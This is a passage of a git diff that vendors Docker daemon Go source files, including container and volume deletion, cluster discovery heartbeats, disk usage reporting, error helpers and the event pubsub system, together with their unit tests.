!os.IsNotExist(err) { + logrus.Errorf("Error saving dying container to disk: %v", err) + } + + // If force removal is required, delete container from various + // indexes even if removal failed. + defer func() { + if err == nil || forceRemove { + daemon.nameIndex.Delete(container.ID) + daemon.linkIndex.delete(container) + selinuxFreeLxcContexts(container.ProcessLabel) + daemon.idIndex.Delete(container.ID) + daemon.containers.Delete(container.ID) + if e := daemon.removeMountPoints(container, removeVolume); e != nil { + logrus.Error(e) + } + daemon.LogContainerEvent(container, "destroy") + } + }() + + if err = os.RemoveAll(container.Root); err != nil { + return fmt.Errorf("Unable to remove filesystem for %v: %v", container.ID, err) + } + + // When container creation fails and `RWLayer` has not been created yet, we + // do not call `ReleaseRWLayer` + if container.RWLayer != nil { + metadata, err := daemon.layerStore.ReleaseRWLayer(container.RWLayer) + layer.LogReleaseMetadata(metadata) + if err != nil && err != layer.ErrMountDoesNotExist { + return fmt.Errorf("Driver %s failed to remove root filesystem %s: %s", daemon.GraphDriverName(), container.ID, err) + } + } + + return nil +} + +// VolumeRm removes the volume with the given name. +// If the volume is referenced by a container it is not removed +// This is called directly from the Engine API +func (daemon *Daemon) VolumeRm(name string, force bool) error { + err := daemon.volumeRm(name) + if err == nil || force { + daemon.volumes.Purge(name) + return nil + } + return err +} + +func (daemon *Daemon) volumeRm(name string) error { + v, err := daemon.volumes.Get(name) + if err != nil { + return err + } + + if err := daemon.volumes.Remove(v); err != nil { + if volumestore.IsInUse(err) { + err := fmt.Errorf("Unable to remove volume, volume still in use: %v", err) + return errors.NewRequestConflictError(err) + } + return fmt.Errorf("Error while removing volume %s: %v", name, err) + } + daemon.LogVolumeEvent(v.Name(), "destroy", map[string]string{"driver": v.DriverName()}) + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/delete_test.go b/vendor/github.com/docker/docker/daemon/delete_test.go new file mode 100644 index 0000000000..1fd27e1ffa --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/delete_test.go @@ -0,0 +1,43 @@ +package daemon + +import ( + "fmt" + "io/ioutil" + "os" + "testing" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" +) + +func TestContainerDoubleDelete(t *testing.T) { + tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + daemon := &Daemon{ + repository: tmp, + root: tmp, + } + daemon.containers = container.NewMemoryStore() + + container := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "test", + State: container.NewState(), + Config: &containertypes.Config{}, + }, + } + daemon.containers.Add(container.ID, container) + + // Mark the container as having a delete in progress + container.SetRemovalInProgress() + + // Try to remove the container when its state is removalInProgress. + // It should return an error indicating it is under removal progress. + if err := daemon.ContainerRm(container.ID, &types.ContainerRmConfig{ForceRemove: true}); err == nil { + t.Fatalf("expected err: %v, got nil", fmt.Sprintf("removal of container %s is already in progress", container.ID)) + } +} diff --git a/vendor/github.com/docker/docker/daemon/discovery.go b/vendor/github.com/docker/docker/daemon/discovery.go new file mode 100644 index 0000000000..ee4ea875b7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/discovery.go @@ -0,0 +1,215 @@ +package daemon + +import ( + "errors" + "fmt" + "reflect" + "strconv" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/discovery" + + // Register the libkv backends for discovery. + _ "github.com/docker/docker/pkg/discovery/kv" +) + +const ( + // defaultDiscoveryHeartbeat is the default value for discovery heartbeat interval. + defaultDiscoveryHeartbeat = 20 * time.Second + // defaultDiscoveryTTLFactor is the default TTL factor for discovery + defaultDiscoveryTTLFactor = 3 +) + +var errDiscoveryDisabled = errors.New("discovery is disabled") + +type discoveryReloader interface { + discovery.Watcher + Stop() + Reload(backend, address string, clusterOpts map[string]string) error + ReadyCh() <-chan struct{} +} + +type daemonDiscoveryReloader struct { + backend discovery.Backend + ticker *time.Ticker + term chan bool + readyCh chan struct{} +} + +func (d *daemonDiscoveryReloader) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) { + return d.backend.Watch(stopCh) +} + +func (d *daemonDiscoveryReloader) ReadyCh() <-chan struct{} { + return d.readyCh +} + +func discoveryOpts(clusterOpts map[string]string) (time.Duration, time.Duration, error) { + var ( + heartbeat = defaultDiscoveryHeartbeat + ttl = defaultDiscoveryTTLFactor * defaultDiscoveryHeartbeat + ) + + if hb, ok := clusterOpts["discovery.heartbeat"]; ok { + h, err := strconv.Atoi(hb) + if err != nil { + return time.Duration(0), time.Duration(0), err + } + + if h <= 0 { + return time.Duration(0), time.Duration(0), + fmt.Errorf("discovery.heartbeat must be positive") + } + + heartbeat = time.Duration(h) * time.Second + ttl = defaultDiscoveryTTLFactor * heartbeat + } + + if tstr, ok := clusterOpts["discovery.ttl"]; ok { + t, err := strconv.Atoi(tstr) + if err != nil { + return time.Duration(0), time.Duration(0), err + } + + if t <= 0 { + return time.Duration(0), time.Duration(0), + fmt.Errorf("discovery.ttl must be positive") + } + + ttl = time.Duration(t) * time.Second + + if _, ok := clusterOpts["discovery.heartbeat"]; !ok { + h := int(t / defaultDiscoveryTTLFactor) + heartbeat = time.Duration(h) * time.Second + } + + if ttl <= heartbeat { + return time.Duration(0), time.Duration(0), + fmt.Errorf("discovery.ttl timer must be greater than discovery.heartbeat") + } + } + + return heartbeat, ttl, nil +} + +// initDiscovery initializes the nodes discovery subsystem by connecting to the specified backend +// and starts a registration loop to advertise the current node under the specified address. +func initDiscovery(backendAddress, advertiseAddress string, clusterOpts map[string]string) (discoveryReloader, error) { + heartbeat, backend, err := parseDiscoveryOptions(backendAddress, clusterOpts) + if err != nil { + return nil, err + } + + reloader := &daemonDiscoveryReloader{ + backend: backend, + ticker: time.NewTicker(heartbeat), + term: make(chan bool), + readyCh: make(chan struct{}), + } + // We call Register() on the discovery backend in a loop for the whole lifetime of the daemon, + // but we never actually Watch() for nodes appearing and disappearing for the moment. + go reloader.advertiseHeartbeat(advertiseAddress) + return reloader, nil +} + +// advertiseHeartbeat registers the current node against the discovery backend using the specified +// address. The function never returns, as registration against the backend comes with a TTL and +// requires regular heartbeats. +func (d *daemonDiscoveryReloader) advertiseHeartbeat(address string) { + var ready bool + if err := d.initHeartbeat(address); err == nil { + ready = true + close(d.readyCh) + } + + for { + select { + case <-d.ticker.C: + if err := d.backend.Register(address); err != nil { + logrus.Warnf("Registering as %q in discovery failed: %v", address, err) + } else { + if !ready { + close(d.readyCh) + ready = true + } + } + case <-d.term: + return + } + } +} + +// initHeartbeat is used to do the first heartbeat. It uses a tight loop until +// either the timeout period is reached or the heartbeat is successful and returns. +func (d *daemonDiscoveryReloader) initHeartbeat(address string) error { + // Setup a short ticker until the first heartbeat has succeeded + t := time.NewTicker(500 * time.Millisecond) + defer t.Stop() + // timeout makes sure that after a period of time we stop being so aggressive trying to reach the discovery service + timeout := time.After(60 * time.Second) + + for { + select { + case <-timeout: + return errors.New("timeout waiting for initial discovery") + case <-d.term: + return errors.New("terminated") + case <-t.C: + if err := d.backend.Register(address); err == nil { + return nil + } + } + } +} + +// Reload makes the watcher to stop advertising and reconfigures it to advertise in a new address. +func (d *daemonDiscoveryReloader) Reload(backendAddress, advertiseAddress string, clusterOpts map[string]string) error { + d.Stop() + + heartbeat, backend, err := parseDiscoveryOptions(backendAddress, clusterOpts) + if err != nil { + return err + } + + d.backend = backend + d.ticker = time.NewTicker(heartbeat) + d.readyCh = make(chan struct{}) + + go d.advertiseHeartbeat(advertiseAddress) + return nil +} + +// Stop terminates the discovery advertising. +func (d *daemonDiscoveryReloader) Stop() { + d.ticker.Stop() + d.term <- true +} + +func parseDiscoveryOptions(backendAddress string, clusterOpts map[string]string) (time.Duration, discovery.Backend, error) { + heartbeat, ttl, err := discoveryOpts(clusterOpts) + if err != nil { + return 0, nil, err + } + + backend, err := discovery.New(backendAddress, heartbeat, ttl, clusterOpts) + if err != nil { + return 0, nil, err + } + return heartbeat, backend, nil +} + +// modifiedDiscoverySettings returns whether the discovery configuration has been modified or not. +func modifiedDiscoverySettings(config *Config, backendType, advertise string, clusterOpts map[string]string) bool { + if config.ClusterStore != backendType || config.ClusterAdvertise != advertise { + return true + } + + if (config.ClusterOpts == nil && clusterOpts == nil) || + (config.ClusterOpts == nil && len(clusterOpts) == 0) || + (len(config.ClusterOpts) == 0 && clusterOpts == nil) { + return false + } + + return !reflect.DeepEqual(config.ClusterOpts, clusterOpts) +} diff --git a/vendor/github.com/docker/docker/daemon/discovery_test.go b/vendor/github.com/docker/docker/daemon/discovery_test.go new file mode 100644 index 0000000000..336973c516 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/discovery_test.go @@ -0,0 +1,164 @@ +package daemon + +import ( + "testing" + "time" +) + +func TestDiscoveryOpts(t *testing.T) { + clusterOpts := map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "5"} + heartbeat, ttl, err := discoveryOpts(clusterOpts) + if err == nil { + t.Fatalf("discovery.ttl < discovery.heartbeat must fail") + } + + clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "10"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err == nil { + t.Fatalf("discovery.ttl == discovery.heartbeat must fail") + } + + clusterOpts = map[string]string{"discovery.heartbeat": "-10", "discovery.ttl": "10"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err == nil { + t.Fatalf("negative discovery.heartbeat must fail") + } + + clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "-10"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err == nil { + t.Fatalf("negative discovery.ttl must fail") + } + + clusterOpts = map[string]string{"discovery.heartbeat": "invalid"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err == nil { + t.Fatalf("invalid discovery.heartbeat must fail") + } + + clusterOpts = map[string]string{"discovery.ttl": "invalid"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err == nil { + t.Fatalf("invalid discovery.ttl must fail") + } + + clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "20"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err != nil { + t.Fatal(err) + } + + if heartbeat != 10*time.Second { + t.Fatalf("Heartbeat - Expected : %v, Actual : %v", 10*time.Second, heartbeat) + } + + if ttl != 20*time.Second { + t.Fatalf("TTL - Expected : %v, Actual : %v", 20*time.Second, ttl) + } + + clusterOpts = map[string]string{"discovery.heartbeat": "10"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err != nil { + t.Fatal(err) + } + + if heartbeat != 10*time.Second { + t.Fatalf("Heartbeat - Expected : %v, Actual : %v", 10*time.Second, heartbeat) + } + + expected := 10 * defaultDiscoveryTTLFactor * time.Second + if ttl != expected { + t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl) + } + + clusterOpts = map[string]string{"discovery.ttl": "30"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err != nil { + t.Fatal(err) + } + + if ttl != 30*time.Second { + t.Fatalf("TTL - Expected : %v, Actual : %v", 30*time.Second, ttl) + } + + expected = 30 * time.Second / defaultDiscoveryTTLFactor + if heartbeat != expected { + t.Fatalf("Heartbeat - Expected : %v, Actual : %v", expected, heartbeat) + } + + clusterOpts = map[string]string{} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err != nil { + t.Fatal(err) + } + + if heartbeat != defaultDiscoveryHeartbeat { + t.Fatalf("Heartbeat - Expected : %v, Actual : %v", defaultDiscoveryHeartbeat, heartbeat) + } + + expected = defaultDiscoveryHeartbeat * defaultDiscoveryTTLFactor + if ttl != expected { + t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl) + } +} + +func TestModifiedDiscoverySettings(t *testing.T) { + cases := []struct { + current *Config + modified *Config + expected bool + }{ + { + current: discoveryConfig("foo", "bar", map[string]string{}), + modified: discoveryConfig("foo", "bar", map[string]string{}), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), + modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", map[string]string{}), + modified: discoveryConfig("foo", "bar", nil), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("foo", "bar", map[string]string{}), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("baz", "bar", nil), + expected: true, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("foo", "baz", nil), + expected: true, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), + expected: true, + }, + } + + for _, c := range cases { + got := modifiedDiscoverySettings(c.current, c.modified.ClusterStore, c.modified.ClusterAdvertise, c.modified.ClusterOpts) + if c.expected != got { + t.Fatalf("expected %v, got %v: current config %v, new config %v", c.expected, got, c.current, c.modified) + } + } +} + +func discoveryConfig(backendAddr, advertiseAddr string, opts map[string]string) *Config { + return &Config{ + CommonConfig: CommonConfig{ + ClusterStore: backendAddr, + ClusterAdvertise: advertiseAddr, + ClusterOpts: opts, + }, + } +} diff --git a/vendor/github.com/docker/docker/daemon/disk_usage.go b/vendor/github.com/docker/docker/daemon/disk_usage.go new file mode 100644 index 0000000000..c3b918660d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/disk_usage.go @@ -0,0 +1,100 @@ +package daemon + +import ( + "fmt" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/directory" + "github.com/docker/docker/volume" +) + +func (daemon *Daemon) getLayerRefs() map[layer.ChainID]int { + tmpImages := daemon.imageStore.Map() + layerRefs := map[layer.ChainID]int{} + for id, img := range tmpImages { + dgst := digest.Digest(id) + if len(daemon.referenceStore.References(dgst)) == 0 && len(daemon.imageStore.Children(id)) != 0 { + continue + } + + rootFS := *img.RootFS + rootFS.DiffIDs = nil + for _, id := range img.RootFS.DiffIDs { + rootFS.Append(id) + chid := rootFS.ChainID() + layerRefs[chid]++ + } + } + + return layerRefs +} + +// SystemDiskUsage returns information about the daemon data disk usage +func (daemon *Daemon) SystemDiskUsage() (*types.DiskUsage, error) { + // Retrieve container list + allContainers, err := daemon.Containers(&types.ContainerListOptions{ + Size: true, + All: true, + }) + if err != nil { + return nil, fmt.Errorf("failed to retrieve container list: %v", err) + } + + // Get all top images with extra attributes + allImages, err := daemon.Images(filters.NewArgs(), false, true) + if err != nil { + return nil, fmt.Errorf("failed to retrieve image list: %v", err) + } + + // Get all local volumes + allVolumes := []*types.Volume{} + getLocalVols := func(v volume.Volume) error { + name := v.Name() + refs := daemon.volumes.Refs(v) + + tv := volumeToAPIType(v) + sz, err := directory.Size(v.Path()) + if err != nil { + logrus.Warnf("failed to determine size of volume %v", name) + sz = -1 + } + tv.UsageData = &types.VolumeUsageData{Size: sz, RefCount: int64(len(refs))} + allVolumes = append(allVolumes, tv) + + return nil + } + + err = daemon.traverseLocalVolumes(getLocalVols) + if err != nil { + return nil, err + } + + // Get total layers size on disk + layerRefs := daemon.getLayerRefs() + allLayers := daemon.layerStore.Map() + var allLayersSize int64 + for _, l := range allLayers { + size, err := l.DiffSize() + if err == nil { + if _, ok := layerRefs[l.ChainID()]; ok { + allLayersSize += size + } else { + logrus.Warnf("found leaked image layer %v", l.ChainID()) + } + } else { + logrus.Warnf("failed to get diff size for layer %v", l.ChainID()) + } + + } + + return &types.DiskUsage{ + LayersSize: allLayersSize, + Containers: allContainers, + Volumes: allVolumes, + Images: allImages, + }, nil +} diff --git a/vendor/github.com/docker/docker/daemon/errors.go b/vendor/github.com/docker/docker/daemon/errors.go new file mode 100644 index 0000000000..566a32f175 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/errors.go @@ -0,0 +1,57 @@ +package daemon + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/errors" + "github.com/docker/docker/reference" +) + +func (d *Daemon) imageNotExistToErrcode(err error) error { + if dne, isDNE := err.(ErrImageDoesNotExist); isDNE { + if strings.Contains(dne.RefOrID, "@") { + e := fmt.Errorf("No such image: %s", dne.RefOrID) + return errors.NewRequestNotFoundError(e) + } + tag := reference.DefaultTag + ref, err := reference.ParseNamed(dne.RefOrID) + if err != nil { + e := fmt.Errorf("No such image: %s:%s", dne.RefOrID, tag) + return errors.NewRequestNotFoundError(e) + } + if tagged, isTagged := ref.(reference.NamedTagged); isTagged { + tag = tagged.Tag() + } + e := fmt.Errorf("No such image: %s:%s", ref.Name(), tag) + return errors.NewRequestNotFoundError(e) + } + return err +} + +type errNotRunning struct { + containerID string +} + +func (e errNotRunning) Error() string { + return fmt.Sprintf("Container %s is not running", e.containerID) +} + +func (e errNotRunning) ContainerIsRunning() bool { + return false +} + +func errContainerIsRestarting(containerID string) error { + err := fmt.Errorf("Container %s is restarting, wait until the container is running", containerID) + return errors.NewRequestConflictError(err) +} + +func errExecNotFound(id string) error { + err := fmt.Errorf("No such exec instance '%s' found in daemon", id) + return errors.NewRequestNotFoundError(err) +} + +func errExecPaused(id string) error { + err := fmt.Errorf("Container %s is paused, unpause the container before exec", id) + return errors.NewRequestConflictError(err) +} diff --git a/vendor/github.com/docker/docker/daemon/events.go b/vendor/github.com/docker/docker/daemon/events.go new file mode 100644 index 0000000000..8fe8e1b640 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/events.go @@ -0,0 +1,132 @@ +package daemon + +import ( + "strings" + "time" + + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/container" + daemonevents "github.com/docker/docker/daemon/events" + "github.com/docker/libnetwork" +) + +// LogContainerEvent generates an event related to a container with only the default attributes. +func (daemon *Daemon) LogContainerEvent(container *container.Container, action string) { + daemon.LogContainerEventWithAttributes(container, action, map[string]string{}) +} + +// LogContainerEventWithAttributes generates an event related to a container with specific given attributes. +func (daemon *Daemon) LogContainerEventWithAttributes(container *container.Container, action string, attributes map[string]string) { + copyAttributes(attributes, container.Config.Labels) + if container.Config.Image != "" { + attributes["image"] = container.Config.Image + } + attributes["name"] = strings.TrimLeft(container.Name, "/") + + actor := events.Actor{ + ID: container.ID, + Attributes: attributes, + } + daemon.EventsService.Log(action, events.ContainerEventType, actor) +} + +// LogImageEvent generates an event related to an image with only the default attributes. +func (daemon *Daemon) LogImageEvent(imageID, refName, action string) { + daemon.LogImageEventWithAttributes(imageID, refName, action, map[string]string{}) +} + +// LogImageEventWithAttributes generates an event related to an image with specific given attributes. +func (daemon *Daemon) LogImageEventWithAttributes(imageID, refName, action string, attributes map[string]string) { + img, err := daemon.GetImage(imageID) + if err == nil && img.Config != nil { + // image has not been removed yet. + // it could be missing if the event is `delete`. + copyAttributes(attributes, img.Config.Labels) + } + if refName != "" { + attributes["name"] = refName + } + actor := events.Actor{ + ID: imageID, + Attributes: attributes, + } + + daemon.EventsService.Log(action, events.ImageEventType, actor) +} + +// LogPluginEvent generates an event related to a plugin with only the default attributes. +func (daemon *Daemon) LogPluginEvent(pluginID, refName, action string) { + daemon.LogPluginEventWithAttributes(pluginID, refName, action, map[string]string{}) +} + +// LogPluginEventWithAttributes generates an event related to a plugin with specific given attributes. +func (daemon *Daemon) LogPluginEventWithAttributes(pluginID, refName, action string, attributes map[string]string) { + attributes["name"] = refName + actor := events.Actor{ + ID: pluginID, + Attributes: attributes, + } + daemon.EventsService.Log(action, events.PluginEventType, actor) +} + +// LogVolumeEvent generates an event related to a volume. +func (daemon *Daemon) LogVolumeEvent(volumeID, action string, attributes map[string]string) { + actor := events.Actor{ + ID: volumeID, + Attributes: attributes, + } + daemon.EventsService.Log(action, events.VolumeEventType, actor) +} + +// LogNetworkEvent generates an event related to a network with only the default attributes. +func (daemon *Daemon) LogNetworkEvent(nw libnetwork.Network, action string) { + daemon.LogNetworkEventWithAttributes(nw, action, map[string]string{}) +} + +// LogNetworkEventWithAttributes generates an event related to a network with specific given attributes. +func (daemon *Daemon) LogNetworkEventWithAttributes(nw libnetwork.Network, action string, attributes map[string]string) { + attributes["name"] = nw.Name() + attributes["type"] = nw.Type() + actor := events.Actor{ + ID: nw.ID(), + Attributes: attributes, + } + daemon.EventsService.Log(action, events.NetworkEventType, actor) +} + +// LogDaemonEventWithAttributes generates an event related to the daemon itself with specific given attributes. +func (daemon *Daemon) LogDaemonEventWithAttributes(action string, attributes map[string]string) { + if daemon.EventsService != nil { + if info, err := daemon.SystemInfo(); err == nil && info.Name != "" { + attributes["name"] = info.Name + } + actor := events.Actor{ + ID: daemon.ID, + Attributes: attributes, + } + daemon.EventsService.Log(action, events.DaemonEventType, actor) + } +} + +// SubscribeToEvents returns the currently record of events, a channel to stream new events from, and a function to cancel the stream of events. +func (daemon *Daemon) SubscribeToEvents(since, until time.Time, filter filters.Args) ([]events.Message, chan interface{}) { + ef := daemonevents.NewFilter(filter) + return daemon.EventsService.SubscribeTopic(since, until, ef) +} + +// UnsubscribeFromEvents stops the event subscription for a client by closing the +// channel where the daemon sends events to. +func (daemon *Daemon) UnsubscribeFromEvents(listener chan interface{}) { + daemon.EventsService.Evict(listener) +} + +// copyAttributes guarantees that labels are not mutated by event triggers. +func copyAttributes(attributes, labels map[string]string) { + if labels == nil { + return + } + for k, v := range labels { + attributes[k] = v + } +} diff --git a/vendor/github.com/docker/docker/daemon/events/events.go b/vendor/github.com/docker/docker/daemon/events/events.go new file mode 100644 index 0000000000..0bf105f54d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/events/events.go @@ -0,0 +1,158 @@ +package events + +import ( + "sync" + "time" + + eventtypes "github.com/docker/docker/api/types/events" + "github.com/docker/docker/pkg/pubsub" +) + +const ( + eventsLimit = 64 + bufferSize = 1024 +) + +// Events is pubsub channel for events generated by the engine. +type Events struct { + mu sync.Mutex + events []eventtypes.Message + pub *pubsub.Publisher +} + +// New returns new *Events instance +func New() *Events { + return &Events{ + events: make([]eventtypes.Message, 0, eventsLimit), + pub: pubsub.NewPublisher(100*time.Millisecond, bufferSize), + } +} + +// Subscribe adds new listener to events, returns slice of 64 stored +// last events, a channel in which you can expect new events (in form +// of interface{}, so you need type assertion), and a function to call +// to stop the stream of events. +func (e *Events) Subscribe() ([]eventtypes.Message, chan interface{}, func()) { + eventSubscribers.Inc() + e.mu.Lock() + current := make([]eventtypes.Message, len(e.events)) + copy(current, e.events) + l := e.pub.Subscribe() + e.mu.Unlock() + + cancel := func() { + e.Evict(l) + } + return current, l, cancel +} + +// SubscribeTopic adds new listener to events, returns slice of 64 stored +// last events, a channel in which you can expect new events (in form +// of interface{}, so you need type assertion). +func (e *Events) SubscribeTopic(since, until time.Time, ef *Filter) ([]eventtypes.Message, chan interface{}) { + eventSubscribers.Inc() + e.mu.Lock() + + var topic func(m interface{}) bool + if ef != nil && ef.filter.Len() > 0 { + topic = func(m interface{}) bool { return ef.Include(m.(eventtypes.Message)) } + } + + buffered := e.loadBufferedEvents(since, until, topic) + + var ch chan interface{} + if topic != nil { + ch = e.pub.SubscribeTopic(topic) + } else { + // Subscribe to all events if there are no filters + ch = e.pub.Subscribe() + } + + e.mu.Unlock() + return buffered, ch +} + +// Evict evicts listener from pubsub +func (e *Events) Evict(l chan interface{}) { + eventSubscribers.Dec() + e.pub.Evict(l) +} + +// Log broadcasts event to listeners. Each listener has 100 millisecond for +// receiving event or it will be skipped. +func (e *Events) Log(action, eventType string, actor eventtypes.Actor) { + eventsCounter.Inc() + now := time.Now().UTC() + jm := eventtypes.Message{ + Action: action, + Type: eventType, + Actor: actor, + Time: now.Unix(), + TimeNano: now.UnixNano(), + } + + // fill deprecated fields for container and images + switch eventType { + case eventtypes.ContainerEventType: + jm.ID = actor.ID + jm.Status = action + jm.From = actor.Attributes["image"] + case eventtypes.ImageEventType: + jm.ID = actor.ID + jm.Status = action + } + + e.mu.Lock() + if len(e.events) == cap(e.events) { + // discard oldest event + copy(e.events, e.events[1:]) + e.events[len(e.events)-1] = jm + } else { + e.events = append(e.events, jm) + } + e.mu.Unlock() + e.pub.Publish(jm) +} + +// SubscribersCount returns number of event listeners +func (e *Events) SubscribersCount() int { + return e.pub.Len() +} + +// loadBufferedEvents iterates over the cached events in the buffer +// and returns those that were emitted between two specific dates. +// It uses `time.Unix(seconds, nanoseconds)` to generate valid dates with those arguments. +// It filters those buffered messages with a topic function if it's not nil, otherwise it adds all messages. +func (e *Events) loadBufferedEvents(since, until time.Time, topic func(interface{}) bool) []eventtypes.Message { + var buffered []eventtypes.Message + if since.IsZero() && until.IsZero() { + return buffered + } + + var sinceNanoUnix int64 + if !since.IsZero() { + sinceNanoUnix = since.UnixNano() + } + + var untilNanoUnix int64 + if !until.IsZero() { + untilNanoUnix = until.UnixNano() + } + + for i := len(e.events) - 1; i >= 0; i-- { + ev := e.events[i] + + if ev.TimeNano < sinceNanoUnix { + break + } + + if untilNanoUnix > 0 && ev.TimeNano > untilNanoUnix { + continue + } + + if topic == nil || topic(ev) { + buffered = append([]eventtypes.Message{ev}, buffered...) + } + } + return buffered +} diff --git a/vendor/github.com/docker/docker/daemon/events/events_test.go b/vendor/github.com/docker/docker/daemon/events/events_test.go new file mode 100644 index 0000000000..bbd160f901 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/events/events_test.go @@ -0,0 +1,275 @@ +package events + +import ( + "fmt" + "testing" + "time" + + "github.com/docker/docker/api/types/events" + timetypes "github.com/docker/docker/api/types/time" + eventstestutils "github.com/docker/docker/daemon/events/testutils" +) + +func TestEventsLog(t *testing.T) { + e := New() + _, l1, _ := e.Subscribe() + _, l2, _ := e.Subscribe() + defer e.Evict(l1) + defer e.Evict(l2) + count := e.SubscribersCount() + if count != 2 { + t.Fatalf("Must be 2 subscribers, got %d", count) + } + actor := events.Actor{ + ID: "cont", + Attributes: map[string]string{"image": "image"}, + } + e.Log("test", events.ContainerEventType, actor) + select { + case msg := <-l1: + jmsg, ok := msg.(events.Message) + if !ok { + t.Fatalf("Unexpected type %T", msg) + } + if len(e.events) != 1 { + t.Fatalf("Must be only one event, got %d", len(e.events)) + } + if jmsg.Status != "test" { + t.Fatalf("Status should be test, got %s", jmsg.Status) + } + if jmsg.ID != "cont" { + t.Fatalf("ID should be cont, got %s", jmsg.ID) + } + if jmsg.From != "image" { + t.Fatalf("From should be image, got %s", jmsg.From) + } + case <-time.After(1 * time.Second): + t.Fatal("Timeout waiting for broadcasted message") + } + select { + case msg := <-l2: + jmsg, ok := msg.(events.Message) + if !ok { + t.Fatalf("Unexpected type %T", msg) + } + if len(e.events) != 1 { + t.Fatalf("Must be only one event, got %d", len(e.events)) + } + if jmsg.Status != "test" { + t.Fatalf("Status should be test, got %s", jmsg.Status) + } + if jmsg.ID != "cont" { + t.Fatalf("ID should be cont, got %s", jmsg.ID) + } + if jmsg.From != "image" { + t.Fatalf("From should be image, got %s", jmsg.From) + } + case <-time.After(1 * time.Second): + t.Fatal("Timeout waiting for broadcasted message") + } +} + +func TestEventsLogTimeout(t *testing.T) { + e := New() + _, l, _ := e.Subscribe() + defer e.Evict(l) + + c := make(chan struct{}) + go func() { + actor := events.Actor{ + ID: "image", + } + e.Log("test", events.ImageEventType, actor) + close(c) + }() + + select { + case <-c: + case <-time.After(time.Second): + t.Fatal("Timeout publishing message") + } +} + +func TestLogEvents(t *testing.T) { + e := New() + + for i := 0; i < eventsLimit+16; i++ { + action := fmt.Sprintf("action_%d", i) + id := fmt.Sprintf("cont_%d", i) + from := fmt.Sprintf("image_%d", i) + + actor := events.Actor{ + ID: id, + Attributes: map[string]string{"image": from}, + } + e.Log(action, events.ContainerEventType, actor) + } + time.Sleep(50 * time.Millisecond) + current, l, _ := e.Subscribe() + for i := 0; i < 10; i++ { + num := i + eventsLimit + 16 + action := fmt.Sprintf("action_%d", num) + id := fmt.Sprintf("cont_%d", num) + from := fmt.Sprintf("image_%d", num) + + actor := events.Actor{ + ID: id, + Attributes: map[string]string{"image": from}, + } + e.Log(action, events.ContainerEventType, actor) + } + if len(e.events) != eventsLimit { + t.Fatalf("Must be %d events, got %d", eventsLimit, len(e.events)) + } + + var msgs []events.Message + for len(msgs) < 10 { + m := <-l + jm, ok := (m).(events.Message) + if !ok { + t.Fatalf("Unexpected type %T", m) + } + msgs = append(msgs, jm) + } + if len(current) != eventsLimit { + t.Fatalf("Must be %d events, got %d", eventsLimit, len(current)) + } + first := current[0] + if first.Status != "action_16" { + t.Fatalf("First action is %s, must be action_16", first.Status) + } + last := current[len(current)-1] + if last.Status != "action_79" { + t.Fatalf("Last action is %s, must be action_79", last.Status) + } + + firstC := msgs[0] + if firstC.Status != "action_80" { + t.Fatalf("First action is %s, must be action_80", firstC.Status) + } + lastC := msgs[len(msgs)-1] + if lastC.Status != "action_89" { + t.Fatalf("Last action is %s, must be action_89", lastC.Status) + } +} + +// https://github.com/docker/docker/issues/20999 +// Fixtures: +// +//2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover) +//2016-03-07T17:28:03.091719377+02:00 network disconnect 19c5ed41acb798f26b751e0035cd7821741ab79e2bbd59a66b5fd8abf954eaa0 (type=bridge, container=0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079, name=bridge) +//2016-03-07T17:28:03.129014751+02:00 container destroy 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover) +func TestLoadBufferedEvents(t *testing.T) { + now := time.Now() + f, err := timetypes.GetTimestamp("2016-03-07T17:28:03.100000000+02:00", now) + if err != nil { + t.Fatal(err) + } + s, sNano, err := 